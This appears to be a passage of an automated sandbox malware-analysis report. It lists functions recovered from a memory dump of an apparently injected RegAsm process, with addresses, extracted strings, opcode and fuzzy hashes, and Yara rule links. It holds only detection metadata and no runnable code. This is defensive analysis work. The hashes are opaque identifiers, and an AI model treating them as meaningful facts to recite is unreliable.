Opcode ID: 5c2cf3118bd35b072a17dd7806aecda8a97d3cf31ca866a3646d4cf68c5b3747
Instruction ID: bb61186b569d582f44b88edbabb621aaad6f1f8181f98328a29c1b5cb013e79f
Opcode Fuzzy Hash: 5c2cf3118bd35b072a17dd7806aecda8a97d3cf31ca866a3646d4cf68c5b3747
Instruction Fuzzy Hash: FF914632A08391DFD324CF28E81036AB7E2AF86315F99866DF4D54B2E1C7789A458B45

Function 004364D0 Relevance: 1.6, Strings: 1, Instructions: 302COMMON

Download Yara Rule

Strings

/, xrefs: 004365D9

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: d39ecc9714537fae3ce85a9280815870aead32280d49a367cd292518a5ba9a5d
Instruction ID: e361dcbe4f2f6cafda4759637c7167deace8efae682d5cc05930c4cac5b47c4a
Opcode Fuzzy Hash: d39ecc9714537fae3ce85a9280815870aead32280d49a367cd292518a5ba9a5d
Instruction Fuzzy Hash: 66A1F77160D3925FC315CE28C45022FBBE2AFD9314F1AC66EE4E587356D638D806CB56

Function 004092C0 Relevance: 1.5, Strings: 1, Instructions: 279COMMON

Download Yara Rule

Strings

*3, xrefs: 00409332

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: *3
API String ID: 0-2439167937
Opcode ID: c59a185b21e1ca09b6ac5ea20017262e8dd844b0b4f64bacda963e66611fdb88
Instruction ID: 9ac632d882f7d23b0d0ce1808261d5d66565db40cd4b7a0671b4ae8e25b6cf88
Opcode Fuzzy Hash: c59a185b21e1ca09b6ac5ea20017262e8dd844b0b4f64bacda963e66611fdb88
Instruction Fuzzy Hash: 1271F13154D3C28BD3118F3988A076BFFE1AF96304F18466EE4D55B382D37A890ACB56

Function 004061A0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 004062D6

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 60c6846c18b919789dfa1b8adb5b8b26ee77c837604559f37d5cd9c942d6175d
Instruction ID: fa0a4f3f6d847ea971c5452c774b7193434d8be2fdbd908acda8a5e3aa5e6316
Opcode Fuzzy Hash: 60c6846c18b919789dfa1b8adb5b8b26ee77c837604559f37d5cd9c942d6175d
Instruction Fuzzy Hash: FFB148701093819FC321DF58C98061BFBE0AFA9708F444A6EF5D997382D635E918CBA7

Function 00419B60 Relevance: 1.5, Strings: 1, Instructions: 242COMMON

Download Yara Rule

Strings

0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00419C81

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
API String ID: 0-442858466
Opcode ID: efb475dcf81fa2a88cbc8ca51332c19ca3812a5d8363f7ee4a4f037011ab74a1
Instruction ID: e83694575c5b0182850c64e511250849f00d0890019c77625b3fd3868af26c12
Opcode Fuzzy Hash: efb475dcf81fa2a88cbc8ca51332c19ca3812a5d8363f7ee4a4f037011ab74a1
Instruction Fuzzy Hash: 6071F636749A8147D728993C9C723FA7A835B92334F2C872FE6B38B3E1E5594C815345

Function 0042D920 Relevance: 1.5, Strings: 1, Instructions: 234COMMON

Download Yara Rule

Strings

0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 0042DA61

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
API String ID: 0-442858466
Opcode ID: 2d46158e68a92680f280f2b1f3b704b3229a311a03ecd2cde4e0acb4100f3bda
Instruction ID: 3426d65016c810099368c1e5f8d4e6c626674790daecdfdd951b1ca3ad4bb295
Opcode Fuzzy Hash: 2d46158e68a92680f280f2b1f3b704b3229a311a03ecd2cde4e0acb4100f3bda
Instruction Fuzzy Hash: D9710633F1A5A147C7188D3D6C512AAAE531BE6330B7E837BE5B58B3D5C92C88034359

Function 00435660 Relevance: 1.5, Strings: 1, Instructions: 211COMMON

Download Yara Rule

Strings

%*+(, xrefs: 00435695

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: %*+(
API String ID: 2994545307-3233224373
Opcode ID: 10e8f7cc9f11839c291b648945f9158d3d083ed9b0a2a2cdd212f36a4858ca0d
Instruction ID: f80ccb29b91bc570a4744049b6f6bf43882bb4efb87622969d7d299c471fa76c
Opcode Fuzzy Hash: 10e8f7cc9f11839c291b648945f9158d3d083ed9b0a2a2cdd212f36a4858ca0d
Instruction Fuzzy Hash: A5516D31A05700DBC7249F28C88076BF7E2EBCA724F69E92ED89497362D735DC118799

Function 00417675 Relevance: 1.4, Strings: 1, Instructions: 187COMMON

Download Yara Rule

Strings

@TB=, xrefs: 00417704

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: @TB=
API String ID: 0-1271029979
Opcode ID: ad0bdd84afe2bb71d414c483e04ae00dafa2aa61afb500ccdc1217782849b9e6
Instruction ID: 408a3de9d370c47e19351de5f2f3a087956215f128b9baa0279489e8eab9355f
Opcode Fuzzy Hash: ad0bdd84afe2bb71d414c483e04ae00dafa2aa61afb500ccdc1217782849b9e6
Instruction Fuzzy Hash: FE51E5716087818BD3268F2AC490372FBF2BF97301F18859DC0D68B796C679A896C765

Function 0042DDD0 Relevance: 1.4, Strings: 1, Instructions: 178COMMON

Download Yara Rule

Strings

00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 0042DEA0

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899
API String ID: 0-2272463933
Opcode ID: 7c979745e3df5926c2c29f341c4fdb53ce971d52e8417e0d3f50a33d64e6dac0
Instruction ID: 869b3963eef22a0099427d75f201b8dab8a3013906bfc14c296fc1f0b668f466
Opcode Fuzzy Hash: 7c979745e3df5926c2c29f341c4fdb53ce971d52e8417e0d3f50a33d64e6dac0
Instruction Fuzzy Hash: 2F51FB33F1E9A147D725C93C6D502A6AA830FE7330B7E876AD5F24B3E1D5598802934E

Function 0043B5A0 Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

@, xrefs: 0043B642

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 643aad024cb9179967f5516613061cfe0a9d1241da38854fae5d5b77afc3ef95
Instruction ID: 838471edba8e1d20463cbb700c90be1a3c81a62bc7f5464742a77883af8fba41
Opcode Fuzzy Hash: 643aad024cb9179967f5516613061cfe0a9d1241da38854fae5d5b77afc3ef95
Instruction Fuzzy Hash: 364111729083109BD320CF55CC4576BBBE6EFD9318F198A2DEAC5173A1E779880487C6

Function 00417670 Relevance: 1.4, Strings: 1, Instructions: 136COMMON

Download Yara Rule

Strings

@TB=, xrefs: 00417704

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: @TB=
API String ID: 0-1271029979
Opcode ID: 767cd1403bab72470c3c18982e83873c1ee293b796285d735a82a41c4f0e5d26
Instruction ID: 64caff7eb1075d012612922b4d77b52ab3a8afb6fb1af9fd4b49a276c7fa0c04
Opcode Fuzzy Hash: 767cd1403bab72470c3c18982e83873c1ee293b796285d735a82a41c4f0e5d26
Instruction Fuzzy Hash: FD41E3746087818BD322CF2AC490372FBF2BF96301F18859DC4D68B792C679E886CB55

Function 00435B90 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

%*+(, xrefs: 00435C75

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: %*+(
API String ID: 0-3233224373
Opcode ID: d8bd18897fa1106508e2349d975a00f0dfaf6b92f2cbe440f1e2f9d236d76544
Instruction ID: e08f603c23ed2a4645cea7845729772066e32d6691cda9322c26d313a11b84a6
Opcode Fuzzy Hash: d8bd18897fa1106508e2349d975a00f0dfaf6b92f2cbe440f1e2f9d236d76544
Instruction Fuzzy Hash: 8B415931104700ABCB21DF14EC80AAFBBA6EB8D708F14B81EF89587251C739DC11DB5A

Function 0040D787 Relevance: 1.4, Strings: 1, Instructions: 116COMMON

Download Yara Rule

Strings

ejkh, xrefs: 0040D813

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: ejkh
API String ID: 2994545307-2912734685
Opcode ID: 283de35f07730bf1a4c2d9390bd18af282233849b0fe8b32a2b1742cab14ccdc
Instruction ID: 11b5030a369e267ce3dd6e03e8ae4c898547ff7b1fffffd621b9d0acb4c76236
Opcode Fuzzy Hash: 283de35f07730bf1a4c2d9390bd18af282233849b0fe8b32a2b1742cab14ccdc
Instruction Fuzzy Hash: 7E311531B026004BC729EF14C891577B7A3AFC1308728987ED8C61BB9ADB39AC05C788

Function 00416DEB Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

"0! , xrefs: 00416E9E

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "0!
API String ID: 0-3102042130
Opcode ID: f49ca4f16df8ec1c708e0f7e07f39219ebc50ff35885d1282b53893c28024b6c
Instruction ID: 3e14af2809d53cb13463f87cdf6d9072eca18bc50d4bd8c615c1fffcfccb112e
Opcode Fuzzy Hash: f49ca4f16df8ec1c708e0f7e07f39219ebc50ff35885d1282b53893c28024b6c
Instruction Fuzzy Hash: 3D310170200B418FD329CF14D5A4A66BBF2BF56304B19D69DC0A68FB58D738E443CB89

Function 0042451F Relevance: 1.3, Strings: 1, Instructions: 8COMMON

Download Yara Rule

Strings

2EB, xrefs: 00424527

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 2EB
API String ID: 0-3446829840
Opcode ID: c01ab6dfa76b673dea5ec2a02edf5145597fb5832d50a96ad297e4bf0d731468
Instruction ID: e88266d54387fad51bda9e963874fc968feeb31a2e1f68e51bf2cdf66a95d8c0
Opcode Fuzzy Hash: c01ab6dfa76b673dea5ec2a02edf5145597fb5832d50a96ad297e4bf0d731468
Instruction Fuzzy Hash: 43A011A8C080008AE200AE02A802838B238220B28AF803038F808B3222F220E008820E

Function 004077F0 Relevance: .8, Instructions: 819COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5856749c19462b42cf21341150f4458666df5029b6d70cd2ed6e8f0e3340305
Instruction ID: 9b9c7e47f4be79423ff0dd66dc4e3aa852f74fd7e6eae795312df2093ba748db
Opcode Fuzzy Hash: d5856749c19462b42cf21341150f4458666df5029b6d70cd2ed6e8f0e3340305
Instruction Fuzzy Hash: 8C52C331A087118BC725DF18E9802ABB3E2FFC4314F25893ED9D6A7385D738A955CB46

Function 00402B70 Relevance: .7, Instructions: 670COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd08c667db1392fa1bb7bff2945c9ef268149ace0e8fdb43e38acc18a06e1733
Instruction ID: a790a7cf1772bef16112172d33ec4c47ac6c293db47a611039e8c5d481795d84
Opcode Fuzzy Hash: dd08c667db1392fa1bb7bff2945c9ef268149ace0e8fdb43e38acc18a06e1733
Instruction Fuzzy Hash: 0452F6315083459FCB15CF24C4906AABBE1FF89314F188A7EE8996B3C1D778D949CB89

Function 00406CE0 Relevance: .7, Instructions: 670COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48cc502ebb3b3b8c736f6e0032355fb927c2482e326923ec9b582e9b1b9a24db
Instruction ID: 72ab7675db55eaec64f35a56cd92b28c78f76193891975a14b599bf55efbb0c5
Opcode Fuzzy Hash: 48cc502ebb3b3b8c736f6e0032355fb927c2482e326923ec9b582e9b1b9a24db
Instruction Fuzzy Hash: 4E52C0B0D0CB848FE7318B24C4847A7BBE1AB91314F14897ED5E656BC2C27DB885C75A

Function 0043AD30 Relevance: .6, Instructions: 633COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c30790522ba3e05bdb6f46894e8324c8f29cec19a03e053d6396212aea2341d
Instruction ID: 2e81389265ec39068e2efbc4d255af2832da4deeaf0ee8a39ccebae26c80aa73
Opcode Fuzzy Hash: 8c30790522ba3e05bdb6f46894e8324c8f29cec19a03e053d6396212aea2341d
Instruction Fuzzy Hash: 9F120336A082518FCB08CF28D89026FB7E1EF8E314F1A4A7ED99597391D734A905CB95

Function 00403580 Relevance: .6, Instructions: 607COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a07af96535d4d1c1f7639a6cd0f286e06ea166c16bf82795aef5774b8827cda8
Instruction ID: 2689e7d5b28afa0227c09d3d0595c59a8dedc242c22121ea0291718ec3659d4c
Opcode Fuzzy Hash: a07af96535d4d1c1f7639a6cd0f286e06ea166c16bf82795aef5774b8827cda8
Instruction Fuzzy Hash: F64222B1614B108FC328CF29C690526BBF5BF85711B604A2ED697A7F90D73AF945CB08

Function 00410C59 Relevance: .5, Instructions: 474COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4226730380cf64491f60214893894b26cb8fd663211530ac24a3e93c7b36bf6a
Instruction ID: b46fda9016f420e2f22aa3b05543190ba727885e3d65cdc5888a09f2124faa48
Opcode Fuzzy Hash: 4226730380cf64491f60214893894b26cb8fd663211530ac24a3e93c7b36bf6a
Instruction Fuzzy Hash: E0023E72A04B404BD714DF3CC885396BBE2AB95324F184A3ED5EA873D2D67DE486C706

Function 00417AF8 Relevance: .4, Instructions: 417COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64663016c3f7e1e5b77ef95a5383f35fe7339210271c535c41e197876c27cae6
Instruction ID: 04afc72fcd6871469f05f3058b6f6bdd18e2572d4aba700baa16428f3a5bfb4c
Opcode Fuzzy Hash: 64663016c3f7e1e5b77ef95a5383f35fe7339210271c535c41e197876c27cae6
Instruction Fuzzy Hash: B2C1EFB49047408FD720DF29C982653BFB1FF56314B1586ADD4C60FB91E339A88ACB96

Function 00405CE0 Relevance: .4, Instructions: 399COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eab858f7205526bd9e1bfd5a13f3b85329fb1f67572e2d255be10cd38678a965
Instruction ID: 3a5b8b6bb00412cac19af0cd667898fa1446fa1c3a6882d826fcaeb958e70237
Opcode Fuzzy Hash: eab858f7205526bd9e1bfd5a13f3b85329fb1f67572e2d255be10cd38678a965
Instruction Fuzzy Hash: 7EE18C751087418FC724DF29C880B2BBBE1EF99300F44882EF4D697792E679E954CB96

Function 00439B00 Relevance: .4, Instructions: 377COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 660db6f06cccd5cf8d0dbc420b92d3e135b9e4a937325ecf1710bc9889b50eb0
Instruction ID: 6ee2157e97612939f3cc76a0a82759336f11cdd4ffa5b49510869822059c27d6
Opcode Fuzzy Hash: 660db6f06cccd5cf8d0dbc420b92d3e135b9e4a937325ecf1710bc9889b50eb0
Instruction Fuzzy Hash: E0B15A72A083100BE314DE29CC8176BBBD5DBC9314F08593EF995C3381EAB8DD05879A

Function 00431E40 Relevance: .3, Instructions: 348COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4933ac366f03470c66bda3ad725c908145eaf8b141d5f550203df71f083531d4
Instruction ID: 5d7f7219289a9caf438100a5be29394ea88bbd45f3ee3a3e3815a4a429e43cde
Opcode Fuzzy Hash: 4933ac366f03470c66bda3ad725c908145eaf8b141d5f550203df71f083531d4
Instruction Fuzzy Hash: 9AC12B72E087D18FCB11C6BCCD8139E7F629B9B224F1D829AD5A16F3C6C1694807C766

Function 00428379 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddc1399ec9bfc5f34465acfc20a0891794777ac3100d50941291acc1327ac989
Instruction ID: c1e2ffefc49ce53675450e8e32cdf86671016c2fbc064f9601c3987bcbaf8375
Opcode Fuzzy Hash: ddc1399ec9bfc5f34465acfc20a0891794777ac3100d50941291acc1327ac989
Instruction Fuzzy Hash: 44B1F370704B518FE725CF39C4917A7BBE1AF52304F58896EC0EB8B782D679A4098B15

Function 0042840A Relevance: .3, Instructions: 338COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70010bc26ddd2a2ecdc843febe5bb7e45321c51722ffbd6b5b1316e6dab102e4
Instruction ID: a7b6cc70ddf1cbb02d491c28e98fb5aa6dd838b71bce99a9f2467179aad81c6a
Opcode Fuzzy Hash: 70010bc26ddd2a2ecdc843febe5bb7e45321c51722ffbd6b5b1316e6dab102e4
Instruction Fuzzy Hash: E9B1F470704B908FE725CF39C4917A7BBE1AF52304F58896EC0EB8B782D679A409CB15

Function 00428459 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 865be10f5e5b8e416bcb864b88d86890ff1d16bca93cac08a226b84d2c992524
Instruction ID: 855f79fc2a0bc0fe0e8afe43f47d4bb71f364d563eb6d90c50a8bb6562051d63
Opcode Fuzzy Hash: 865be10f5e5b8e416bcb864b88d86890ff1d16bca93cac08a226b84d2c992524
Instruction Fuzzy Hash: 65B1F470704B508FE725CF39C4917A7BBE1AF52304F58896EC0EB8B782D67DA4098B15

Function 0043C7D0 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3a2c0889b4a069eac07530809c8e4b4c5ecde2e4aeb34b2b7ffabef19b128b7
Instruction ID: 5e4e1a03b1f9e66379612c72a1ec20b173c7faaf42b0a12b24a6ae32266cc9a4
Opcode Fuzzy Hash: a3a2c0889b4a069eac07530809c8e4b4c5ecde2e4aeb34b2b7ffabef19b128b7
Instruction Fuzzy Hash: C9A1E331A083118BC724DF28C8C162BB7E2EFC9714F19952DE9C6A7351DB79AC51C786

Function 0043C460 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c26bd0b406ec0ad635e3c4b45a77163388a1b757b18d12edc31244ff72d0964a
Instruction ID: 10404c7dfef822de7b1020b8dc228c5d3042818e9b2a32d33877fa8b590e0ec5
Opcode Fuzzy Hash: c26bd0b406ec0ad635e3c4b45a77163388a1b757b18d12edc31244ff72d0964a
Instruction Fuzzy Hash: 5A9103356043028BC724DF18C891A3FB7E2EFCD714F15952EE9869B351EB38AC118B85

Function 00406840 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03a52a1ad74051845515929265544f186aad33e8d97b6de79312a11ff83a37ec
Instruction ID: fd6c2b462fc64d35ffbc1d170f6f183477a24f54d1d1efa4ba11a0009e4e830f
Opcode Fuzzy Hash: 03a52a1ad74051845515929265544f186aad33e8d97b6de79312a11ff83a37ec
Instruction Fuzzy Hash: 91C15AB2A087518FC330CF28C856BABB7E0AF85318F09493DD5DAD6342D778A555CB46

Function 00428447 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8282806200de375fff037e48920e1fd944b6580befc94a5fb122645b8365230
Instruction ID: 1a6d0a23743ec26c95684495a8f1035cf1c2d1acb992bd88eeac5e3f48a3ffec
Opcode Fuzzy Hash: a8282806200de375fff037e48920e1fd944b6580befc94a5fb122645b8365230
Instruction Fuzzy Hash: 3BA1C770605B508EE725CF35C4917A3BBE1AF52304F54895ED0EB8B782D678A409CB65

Function 00426CF3 Relevance: .3, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faf9876edd2ed3d0eb6dbf5db98b01f759f16913e76dbe65ca7f3da26e5c507e
Instruction ID: 1711ec92b126bdb5ecec348a11a8854d3a67b007717b6f72a2c5c0cfa47d1efe
Opcode Fuzzy Hash: faf9876edd2ed3d0eb6dbf5db98b01f759f16913e76dbe65ca7f3da26e5c507e
Instruction Fuzzy Hash: C4A19971704B418BE7218B35D881763BBE2EFA2314F598A2ED0EB477D2C738A805CB45

Function 0043A8B0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffdc5a85d22a2472c3095955b835e0aa3f2a76c3a4846f672050c52fda311b61
Instruction ID: 85fb01f5858c44322bc99737c64197bb4e73da660ad129e5441660d3e3fd52c8
Opcode Fuzzy Hash: ffdc5a85d22a2472c3095955b835e0aa3f2a76c3a4846f672050c52fda311b61
Instruction Fuzzy Hash: 7CA1563A748611CFCB049F28E8E026AB3E1EBCE315F0E86BDC5C597755D2389856CB85

Function 004397A0 Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 236d88e1505bedcc90e359d61e48ebf9da4aee982a8ada30a69ed0228cc9c13c
Instruction ID: 862fd93503142289749ce71677033ae7526331cc912a265556ec69f2e9d09d67
Opcode Fuzzy Hash: 236d88e1505bedcc90e359d61e48ebf9da4aee982a8ada30a69ed0228cc9c13c
Instruction Fuzzy Hash: 2D810471608341AFE724EB24CC41BBFB7D5EF8A314F14592EE98983392EA749C40C75A

Function 0042AF2B Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37ce9789a5d70e1c34df3f1d163e6adec9cad68b50e311b9f190c6963ee573b9
Instruction ID: 7267e1a54e9a94c40c4d61fa6a091e1d8637ad7e469afbbdd3ac74cd06a0e51c
Opcode Fuzzy Hash: 37ce9789a5d70e1c34df3f1d163e6adec9cad68b50e311b9f190c6963ee573b9
Instruction Fuzzy Hash: ACA13872B04B804FD3158B38D89536BBFE2AB96308F5CC97DC4DB87746D639A4058716

Function 0042B6C2 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

